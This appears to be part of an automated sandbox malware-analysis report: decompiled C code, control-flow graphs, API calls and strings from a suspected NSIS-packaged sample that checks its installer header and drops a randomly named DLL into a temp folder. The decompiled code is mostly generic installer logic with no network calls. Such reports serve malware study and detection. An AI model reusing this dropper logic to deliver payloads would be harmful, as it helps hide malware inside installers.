                                                                                            control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 196 402eb2-402eb7 189->196 197 402de7-402dea 189->197 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 198 402d0f-402d11 192->198 196->182 199 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 197->199 200 402dec-402dfd call 4031da call 4031a8 197->200 201 402d17-402d1d 198->201 202 402e6e-402e76 call 402bc5 198->202 227 402e64-402e69 199->227 228 402e78-402ea8 call 4031da call 402f01 199->228 220 402e02-402e04 200->220 205 402d9d-402da1 201->205 206 402d1f-402d37 call 40571d 201->206 202->196 210 402da3-402da9 call 402bc5 205->210 211 402daa-402db0 205->211 206->211 224 402d39-402d40 206->224 210->211 216 402db2-402dc0 call 405e0f 211->216 217 402dc3-402dcd 211->217 216->217 217->189 217->190 220->196 225 402e0a-402e10 220->225 224->211 229 402d42-402d49 224->229 225->196 225->199 227->182 237 402ead-402eb0 228->237 229->211 231 402d4b-402d52 229->231 231->211 233 402d54-402d5b 231->233 233->211 234 402d5d-402d7d 233->234 234->196 236 402d83-402d87 234->236 238 402d89-402d8d 236->238 239 402d8f-402d97 236->239 237->196 240 402eb9-402eca 237->240 238->189 238->239 239->211 241 402d99-402d9b 239->241 242 402ed2-402ed7 240->242 243 402ecc 240->243 241->211 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                                                                                            C-Code - Quality: 96%
                                                                                            			E00402C5B(void* __eflags, signed int _a4) {
                                                                                            				long _v8;
                                                                                            				long _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				long _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				intOrPtr _v36;
                                                                                            				signed int _v40;
                                                                                            				char _v300;
                                                                                            				signed int _t54;
                                                                                            				void* _t57;
                                                                                            				void* _t62;
                                                                                            				intOrPtr _t65;
                                                                                            				void* _t68;
                                                                                            				intOrPtr* _t70;
                                                                                            				intOrPtr _t71;
                                                                                            				signed int _t77;
                                                                                            				signed int _t82;
                                                                                            				signed int _t83;
                                                                                            				signed int _t89;
                                                                                            				intOrPtr _t92;
                                                                                            				signed int _t101;
                                                                                            				signed int _t103;
                                                                                            				void* _t105;
                                                                                            				signed int _t106;
                                                                                            				signed int _t109;
                                                                                            				void* _t110;
                                                                                            
                                                                                            				_v8 = 0;
                                                                                            				_v12 = 0;
                                                                                            				 *0x423eac = GetTickCount() + 0x3e8;
                                                                                            				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\O53TFikPkp.exe", 0x400);
                                                                                            				_t105 = E0040575C("C:\\Users\\jones\\Desktop\\O53TFikPkp.exe", 0x80000000, 3);
                                                                                            				 *0x409010 = _t105;
                                                                                            				if(_t105 == 0xffffffff) {
                                                                                            					return "Error launching installer";
                                                                                            				}
                                                                                            				E00405A85("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\O53TFikPkp.exe");
                                                                                            				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\Desktop"));
                                                                                            				_t54 = GetFileSize(_t105, 0);
                                                                                            				__eflags = _t54;
                                                                                            				 *0x41f048 = _t54;
                                                                                            				_t109 = _t54;
                                                                                            				if(_t54 <= 0) {
                                                                                            					L22:
                                                                                            					E00402BC5(1);
                                                                                            					__eflags =  *0x423eb4;
                                                                                            					if( *0x423eb4 == 0) {
                                                                                            						goto L30;
                                                                                            					}
                                                                                            					__eflags = _v12;
                                                                                            					if(_v12 == 0) {
                                                                                            						L26:
                                                                                            						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                            						_t110 = _t57;
                                                                                            						E00405E7D(0x40afb0);
                                                                                            						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                                                                                            						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                            						__eflags = _t62 - 0xffffffff;
                                                                                            						 *0x409014 = _t62;
                                                                                            						if(_t62 != 0xffffffff) {
                                                                                            							_t65 = E004031DA( *0x423eb4 + 0x1c);
                                                                                            							 *0x41f04c = _t65;
                                                                                            							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                            							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                            							__eflags = _t68 - _v20;
                                                                                            							if(_t68 == _v20) {
                                                                                            								__eflags = _v40 & 0x00000001;
                                                                                            								 *0x423eb0 = _t110;
                                                                                            								 *0x423eb8 =  *_t110;
                                                                                            								if((_v40 & 0x00000001) != 0) {
                                                                                            									 *0x423ebc =  *0x423ebc + 1;
                                                                                            									__eflags =  *0x423ebc;
                                                                                            								}
                                                                                            								_t45 = _t110 + 0x44; // 0x44
                                                                                            								_t70 = _t45;
                                                                                            								_t101 = 8;
                                                                                            								do {
                                                                                            									_t70 = _t70 - 8;
                                                                                            									 *_t70 =  *_t70 + _t110;
                                                                                            									_t101 = _t101 - 1;
                                                                                            									__eflags = _t101;
                                                                                            								} while (_t101 != 0);
                                                                                            								_t71 =  *0x41703c; // 0x4fb52
                                                                                            								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                                                            								E0040571D(0x423ec0, _t110 + 4, 0x40);
                                                                                            								__eflags = 0;
                                                                                            								return 0;
                                                                                            							}
                                                                                            							goto L30;
                                                                                            						}
                                                                                            						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                            					}
                                                                                            					E004031DA( *0x417038);
                                                                                            					_t77 = E004031A8( &_a4, 4); // executed
                                                                                            					__eflags = _t77;
                                                                                            					if(_t77 == 0) {
                                                                                            						goto L30;
                                                                                            					}
                                                                                            					__eflags = _v8 - _a4;
                                                                                            					if(_v8 != _a4) {
                                                                                            						goto L30;
                                                                                            					}
                                                                                            					goto L26;
                                                                                            				} else {
                                                                                            					do {
                                                                                            						_t106 = _t109;
                                                                                            						asm("sbb eax, eax");
                                                                                            						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
                                                                                            						__eflags = _t109 - _t82;
                                                                                            						if(_t109 >= _t82) {
                                                                                            							_t106 = _t82;
                                                                                            						}
                                                                                            						_t83 = E004031A8(0x417048, _t106); // executed
                                                                                            						__eflags = _t83;
                                                                                            						if(_t83 == 0) {
                                                                                            							E00402BC5(1);
                                                                                            							L30:
                                                                                            							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                            						}
                                                                                            						__eflags =  *0x423eb4;
                                                                                            						if( *0x423eb4 != 0) {
                                                                                            							__eflags = _a4 & 0x00000002;
                                                                                            							if((_a4 & 0x00000002) == 0) {
                                                                                            								E00402BC5(0);
                                                                                            							}
                                                                                            							goto L19;
                                                                                            						}
                                                                                            						E0040571D( &_v40, 0x417048, 0x1c);
                                                                                            						_t89 = _v40;
                                                                                            						__eflags = _t89 & 0xfffffff0;
                                                                                            						if((_t89 & 0xfffffff0) != 0) {
                                                                                            							goto L19;
                                                                                            						}
                                                                                            						__eflags = _v36 - 0xdeadbeef;
                                                                                            						if(_v36 != 0xdeadbeef) {
                                                                                            							goto L19;
                                                                                            						}
                                                                                            						__eflags = _v24 - 0x74736e49;
                                                                                            						if(_v24 != 0x74736e49) {
                                                                                            							goto L19;
                                                                                            						}
                                                                                            						__eflags = _v28 - 0x74666f73;
                                                                                            						if(_v28 != 0x74666f73) {
                                                                                            							goto L19;
                                                                                            						}
                                                                                            						__eflags = _v32 - 0x6c6c754e;
                                                                                            						if(_v32 != 0x6c6c754e) {
                                                                                            							goto L19;
                                                                                            						}
                                                                                            						_a4 = _a4 | _t89;
                                                                                            						_t103 =  *0x417038; // 0x42a75
                                                                                            						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                                                                                            						_t92 = _v16;
                                                                                            						__eflags = _t92 - _t109;
                                                                                            						 *0x423eb4 = _t103;
                                                                                            						if(_t92 > _t109) {
                                                                                            							goto L30;
                                                                                            						}
                                                                                            						__eflags = _a4 & 0x00000008;
                                                                                            						if((_a4 & 0x00000008) != 0) {
                                                                                            							L15:
                                                                                            							_v12 = _v12 + 1;
                                                                                            							_t109 = _t92 - 4;
                                                                                            							__eflags = _t106 - _t109;
                                                                                            							if(_t106 > _t109) {
                                                                                            								_t106 = _t109;
                                                                                            							}
                                                                                            							goto L19;
                                                                                            						}
                                                                                            						__eflags = _a4 & 0x00000004;
                                                                                            						if((_a4 & 0x00000004) != 0) {
                                                                                            							goto L22;
                                                                                            						}
                                                                                            						goto L15;
                                                                                            						L19:
                                                                                            						__eflags = _t109 -  *0x41f048; // 0x44855
                                                                                            						if(__eflags < 0) {
                                                                                            							_v8 = E00405E0F(_v8, 0x417048, _t106);
                                                                                            						}
                                                                                            						 *0x417038 =  *0x417038 + _t106;
                                                                                            						_t109 = _t109 - _t106;
                                                                                            						__eflags = _t109;
                                                                                            					} while (_t109 > 0);
                                                                                            					goto L22;
                                                                                            				}
                                                                                            			}































                                                                                            0x00402c69
                                                                                            0x00402c6c
                                                                                            0x00402c86
                                                                                            0x00402c8b
                                                                                            0x00402c9e
                                                                                            0x00402ca3
                                                                                            0x00402ca9
                                                                                            0x00000000
                                                                                            0x00402cab
                                                                                            0x00402cbc
                                                                                            0x00402ccd
                                                                                            0x00402cd4
                                                                                            0x00402cda
                                                                                            0x00402cdc
                                                                                            0x00402ce1
                                                                                            0x00402ce3
                                                                                            0x00402dd3
                                                                                            0x00402dd5
                                                                                            0x00402dda
                                                                                            0x00402de1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402de7
                                                                                            0x00402dea
                                                                                            0x00402e16
                                                                                            0x00402e1b
                                                                                            0x00402e26
                                                                                            0x00402e28
                                                                                            0x00402e39
                                                                                            0x00402e54
                                                                                            0x00402e5a
                                                                                            0x00402e5d
                                                                                            0x00402e62
                                                                                            0x00402e81
                                                                                            0x00402e91
                                                                                            0x00402ea3
                                                                                            0x00402ea8
                                                                                            0x00402ead
                                                                                            0x00402eb0
                                                                                            0x00402eb9
                                                                                            0x00402ebd
                                                                                            0x00402ec5
                                                                                            0x00402eca
                                                                                            0x00402ecc
                                                                                            0x00402ecc
                                                                                            0x00402ecc
                                                                                            0x00402ed4
                                                                                            0x00402ed4
                                                                                            0x00402ed7
                                                                                            0x00402ed8
                                                                                            0x00402ed8
                                                                                            0x00402edb
                                                                                            0x00402edd
                                                                                            0x00402edd
                                                                                            0x00402edd
                                                                                            0x00402ee0
                                                                                            0x00402ee7
                                                                                            0x00402ef3
                                                                                            0x00402ef8
                                                                                            0x00000000
                                                                                            0x00402ef8
                                                                                            0x00000000
                                                                                            0x00402eb0
                                                                                            0x00000000
                                                                                            0x00402e64
                                                                                            0x00402df2
                                                                                            0x00402dfd
                                                                                            0x00402e02
                                                                                            0x00402e04
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402e0d
                                                                                            0x00402e10
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ce9
                                                                                            0x00402ce9
                                                                                            0x00402cee
                                                                                            0x00402cf2
                                                                                            0x00402cf9
                                                                                            0x00402cfe
                                                                                            0x00402d00
                                                                                            0x00402d02
                                                                                            0x00402d02
                                                                                            0x00402d0a
                                                                                            0x00402d0f
                                                                                            0x00402d11
                                                                                            0x00402e70
                                                                                            0x00402eb2
                                                                                            0x00000000
                                                                                            0x00402eb2
                                                                                            0x00402d17
                                                                                            0x00402d1d
                                                                                            0x00402d9d
                                                                                            0x00402da1
                                                                                            0x00402da4
                                                                                            0x00402da9
                                                                                            0x00000000
                                                                                            0x00402da1
                                                                                            0x00402d2a
                                                                                            0x00402d2f
                                                                                            0x00402d32
                                                                                            0x00402d37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d39
                                                                                            0x00402d40
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d42
                                                                                            0x00402d49
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d4b
                                                                                            0x00402d52
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d54
                                                                                            0x00402d5b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d5d
                                                                                            0x00402d63
                                                                                            0x00402d6c
                                                                                            0x00402d72
                                                                                            0x00402d75
                                                                                            0x00402d77
                                                                                            0x00402d7d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d83
                                                                                            0x00402d87
                                                                                            0x00402d8f
                                                                                            0x00402d8f
                                                                                            0x00402d92
                                                                                            0x00402d95
                                                                                            0x00402d97
                                                                                            0x00402d99
                                                                                            0x00402d99
                                                                                            0x00000000
                                                                                            0x00402d97
                                                                                            0x00402d89
                                                                                            0x00402d8d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402daa
                                                                                            0x00402daa
                                                                                            0x00402db0
                                                                                            0x00402dc0
                                                                                            0x00402dc0
                                                                                            0x00402dc3
                                                                                            0x00402dc9
                                                                                            0x00402dcb
                                                                                            0x00402dcb
                                                                                            0x00000000
                                                                                            0x00402ce9

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402C6F
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\O53TFikPkp.exe,00000400), ref: 00402C8B
                                                                                              • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\O53TFikPkp.exe,80000000,00000003), ref: 00405760
                                                                                              • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O53TFikPkp.exe,C:\Users\user\Desktop\O53TFikPkp.exe,80000000,00000003), ref: 00402CD4
                                                                                            • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                                                                                            Strings
                                                                                            • "C:\Users\user\Desktop\O53TFikPkp.exe" , xrefs: 00402C68
                                                                                            • Null, xrefs: 00402D54
                                                                                            • Inst, xrefs: 00402D42
                                                                                            • Error launching installer, xrefs: 00402CAB
                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                                                                                            • soft, xrefs: 00402D4B
                                                                                            • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                                                                                            • C:\Users\user\Desktop\O53TFikPkp.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                            • String ID: "C:\Users\user\Desktop\O53TFikPkp.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\O53TFikPkp.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                            • API String ID: 2803837635-2999657324
                                                                                            • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                                                                                            • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                                                                                            • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                                                                                            • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 342 4017a5-4017b7 334->342 343 401795-4017a3 CompareFileTime 334->343 337 4017c5-4017e1 call 40575c 335->337 338 4017bf-4017c0 call 40573d 335->338 345 4017e3-4017e6 337->345 346 401859-401882 call 404e23 call 402f01 337->346 338->337 342->335 343->342 348 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->348 349 40183b-401845 call 404e23 345->349 360 401884-401888 346->360 361 40188a-401896 SetFileTime 346->361 348->333 380 401830-401831 348->380 358 40184e-401854 349->358 362 402886 358->362 360->361 364 40189c-4018a7 FindCloseChangeNotification 360->364 361->364 366 402888-40288c 362->366 367 40287d-402880 364->367 368 4018ad-4018b0 364->368 367->362 370 4018b2-4018c3 call 405aa7 lstrcatA 368->370 371 4018c5-4018c8 call 405aa7 368->371 375 4018cd-402205 call 405346 370->375 371->375 375->366 384 40264e-402655 375->384 380->358 382 401833-401834 380->382 382->349 384->367
                                                                                            C-Code - Quality: 75%
                                                                                            			E00401734(FILETIME* __ebx, void* __eflags) {
                                                                                            				void* _t33;
                                                                                            				void* _t41;
                                                                                            				void* _t43;
                                                                                            				FILETIME* _t49;
                                                                                            				FILETIME* _t62;
                                                                                            				void* _t64;
                                                                                            				signed int _t70;
                                                                                            				FILETIME* _t71;
                                                                                            				FILETIME* _t75;
                                                                                            				signed int _t77;
                                                                                            				void* _t80;
                                                                                            				CHAR* _t82;
                                                                                            				void* _t85;
                                                                                            
                                                                                            				_t75 = __ebx;
                                                                                            				_t82 = E004029E8(0x31);
                                                                                            				 *(_t85 - 8) = _t82;
                                                                                            				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                                                                            				_t33 = E004055E5(_t82);
                                                                                            				_push(_t82);
                                                                                            				if(_t33 == 0) {
                                                                                            					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                                            				} else {
                                                                                            					_push(0x409b68);
                                                                                            					E00405A85();
                                                                                            				}
                                                                                            				E00405CE3(0x409b68);
                                                                                            				while(1) {
                                                                                            					__eflags =  *(_t85 + 8) - 3;
                                                                                            					if( *(_t85 + 8) >= 3) {
                                                                                            						_t64 = E00405D7C(0x409b68);
                                                                                            						_t77 = 0;
                                                                                            						__eflags = _t64 - _t75;
                                                                                            						if(_t64 != _t75) {
                                                                                            							_t71 = _t64 + 0x14;
                                                                                            							__eflags = _t71;
                                                                                            							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                                                                            						}
                                                                                            						asm("sbb eax, eax");
                                                                                            						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                            						__eflags = _t70;
                                                                                            						 *(_t85 + 8) = _t70;
                                                                                            					}
                                                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                                                            					if( *(_t85 + 8) == _t75) {
                                                                                            						E0040573D(0x409b68);
                                                                                            					}
                                                                                            					__eflags =  *(_t85 + 8) - 1;
                                                                                            					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                            					__eflags = _t41 - 0xffffffff;
                                                                                            					 *(_t85 - 0x34) = _t41;
                                                                                            					if(_t41 != 0xffffffff) {
                                                                                            						break;
                                                                                            					}
                                                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                                                            					if( *(_t85 + 8) != _t75) {
                                                                                            						E00404E23(0xffffffe2,  *(_t85 - 8));
                                                                                            						__eflags =  *(_t85 + 8) - 2;
                                                                                            						if(__eflags == 0) {
                                                                                            							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                            						}
                                                                                            						L31:
                                                                                            						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                                                                                            						__eflags =  *0x423f28;
                                                                                            						goto L32;
                                                                                            					} else {
                                                                                            						E00405A85(0x40a368, 0x424000);
                                                                                            						E00405A85(0x424000, 0x409b68);
                                                                                            						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\jones\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                                                                            						E00405A85(0x424000, 0x40a368);
                                                                                            						_t62 = E00405346("C:\Users\jones\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dll",  *(_t85 - 0x24) >> 3) - 4;
                                                                                            						__eflags = _t62;
                                                                                            						if(_t62 == 0) {
                                                                                            							continue;
                                                                                            						} else {
                                                                                            							__eflags = _t62 == 1;
                                                                                            							if(_t62 == 1) {
                                                                                            								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                                                                                            								L32:
                                                                                            								_t49 = 0;
                                                                                            								__eflags = 0;
                                                                                            							} else {
                                                                                            								_push(0x409b68);
                                                                                            								_push(0xfffffffa);
                                                                                            								E00404E23();
                                                                                            								L29:
                                                                                            								_t49 = 0x7fffffff;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					L33:
                                                                                            					return _t49;
                                                                                            				}
                                                                                            				E00404E23(0xffffffea,  *(_t85 - 8));
                                                                                            				 *0x423f54 =  *0x423f54 + 1;
                                                                                            				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                                                                                            				 *0x423f54 =  *0x423f54 - 1;
                                                                                            				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                                                                            				_t80 = _t43;
                                                                                            				if( *(_t85 - 0x18) != 0xffffffff) {
                                                                                            					L22:
                                                                                            					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                                                                            				} else {
                                                                                            					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                                                                            					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                                                                            						goto L22;
                                                                                            					}
                                                                                            				}
                                                                                            				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                                                                            				__eflags = _t80 - _t75;
                                                                                            				if(_t80 >= _t75) {
                                                                                            					goto L31;
                                                                                            				} else {
                                                                                            					__eflags = _t80 - 0xfffffffe;
                                                                                            					if(_t80 != 0xfffffffe) {
                                                                                            						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                                                                                            					} else {
                                                                                            						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                                                                                            						lstrcatA(0x409b68,  *(_t85 - 8));
                                                                                            					}
                                                                                            					_push(0x200010);
                                                                                            					_push(0x409b68);
                                                                                            					E00405346();
                                                                                            					goto L29;
                                                                                            				}
                                                                                            				goto L33;
                                                                                            			}
















                                                                                            0x00401734
                                                                                            0x0040173b
                                                                                            0x00401744
                                                                                            0x00401747
                                                                                            0x0040174a
                                                                                            0x0040174f
                                                                                            0x00401757
                                                                                            0x00401773
                                                                                            0x00401759
                                                                                            0x00401759
                                                                                            0x0040175a
                                                                                            0x0040175a
                                                                                            0x00401779
                                                                                            0x00401783
                                                                                            0x00401783
                                                                                            0x00401787
                                                                                            0x0040178a
                                                                                            0x0040178f
                                                                                            0x00401791
                                                                                            0x00401793
                                                                                            0x00401798
                                                                                            0x00401798
                                                                                            0x004017a3
                                                                                            0x004017a3
                                                                                            0x004017b4
                                                                                            0x004017b6
                                                                                            0x004017b6
                                                                                            0x004017b7
                                                                                            0x004017b7
                                                                                            0x004017ba
                                                                                            0x004017bd
                                                                                            0x004017c0
                                                                                            0x004017c0
                                                                                            0x004017c7
                                                                                            0x004017d6
                                                                                            0x004017db
                                                                                            0x004017de
                                                                                            0x004017e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004017e3
                                                                                            0x004017e6
                                                                                            0x00401840
                                                                                            0x00401845
                                                                                            0x004015a8
                                                                                            0x0040264e
                                                                                            0x0040264e
                                                                                            0x0040287d
                                                                                            0x00402880
                                                                                            0x00402880
                                                                                            0x00000000
                                                                                            0x004017e8
                                                                                            0x004017ee
                                                                                            0x004017f9
                                                                                            0x00401806
                                                                                            0x00401811
                                                                                            0x00401827
                                                                                            0x00401827
                                                                                            0x0040182a
                                                                                            0x00000000
                                                                                            0x00401830
                                                                                            0x00401830
                                                                                            0x00401831
                                                                                            0x0040184e
                                                                                            0x00402886
                                                                                            0x00402886
                                                                                            0x00402886
                                                                                            0x00401833
                                                                                            0x00401833
                                                                                            0x00401834
                                                                                            0x00401492
                                                                                            0x00402200
                                                                                            0x00402200
                                                                                            0x00402200
                                                                                            0x00401831
                                                                                            0x0040182a
                                                                                            0x00402888
                                                                                            0x0040288c
                                                                                            0x0040288c
                                                                                            0x0040185e
                                                                                            0x00401863
                                                                                            0x00401871
                                                                                            0x00401876
                                                                                            0x0040187c
                                                                                            0x00401880
                                                                                            0x00401882
                                                                                            0x0040188a
                                                                                            0x00401896
                                                                                            0x00401884
                                                                                            0x00401884
                                                                                            0x00401888
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00401888
                                                                                            0x0040189f
                                                                                            0x004018a5
                                                                                            0x004018a7
                                                                                            0x00000000
                                                                                            0x004018ad
                                                                                            0x004018ad
                                                                                            0x004018b0
                                                                                            0x004018c8
                                                                                            0x004018b2
                                                                                            0x004018b5
                                                                                            0x004018be
                                                                                            0x004018be
                                                                                            0x004018cd
                                                                                            0x004018d2
                                                                                            0x004021fb
                                                                                            0x00000000
                                                                                            0x004021fb
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • lstrcatA.KERNEL32(00000000,00000000,jwcvvjog,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,jwcvvjog,jwcvvjog,00000000,00000000,jwcvvjog,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                              • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                                                                                              • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                                                                                              • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                                                                                              • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                                                                                              • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                                                                                              • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr28EF.tmp$C:\Users\user\AppData\Local\Temp\nsr28EF.tmp\eqbaypenr.dll$jwcvvjog
                                                                                            • API String ID: 1941528284-2625875435
